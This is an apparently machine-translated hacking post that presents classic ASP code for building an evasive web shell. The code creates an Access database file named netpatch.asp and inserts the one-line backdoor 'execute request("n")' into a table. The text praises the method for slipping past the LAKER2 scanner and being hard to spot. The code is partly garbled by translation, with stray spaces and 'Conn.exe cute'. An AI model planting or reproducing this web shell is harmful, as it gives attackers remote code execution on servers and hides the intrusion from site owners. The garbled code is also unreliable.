This is intended to escape LAKER2 and check ASP Trojans.
Now the challenge is successful, and it has been added as the check object. I hope you will like it!
The ADOX. Catalog component is used.
Copy codeThe Code is as follows: <%
'Code by netpatch
Dim dbfile, SQL
Db = "netpatch. asp"
Dbfile = server. MapPath (db)
Set ydb = server. CreateObject ("ADOX. Catalog ")
Ydb. Create "Provider = Microsoft. Jet. OLEDB.4.0; Data Source =" & dbfile
Set ydb = nothing
If err. number = 0 then
Response. Write dbfile & "created successfully <br>"
Else
Response. Write "creation failed, cause:" & err. description
Response. End
End if
Set Conn = Server. CreateObject ("ADODB. Connection ")
Conn. Open "Provider = Microsoft. Jet. OLEDB.4.0; Data Source =" & dbfile
SQL = "CREATE TABLE fdata ([data] Memo )"
Conn.exe cute (SQL)
Set rs = CreateObject ("ADODB. RecordSet ")
Rs. Open "FData", conn, 1, 3
Rs. addnew
Rs ("data") = "<% execute request (" n ") %>" '(remember to remove comments! One-sentence backdoor execute request ("n "))
Rs. update
%>
This script mainly uses the ADOX. Catalog component
Create an empty database file named netpatch. asp
Insert a single-statement Trojan horse into the new table and use it as the ASP Trojan of the C/S version!
Advantages, relatively hidden, it is not easy to let people see what this is!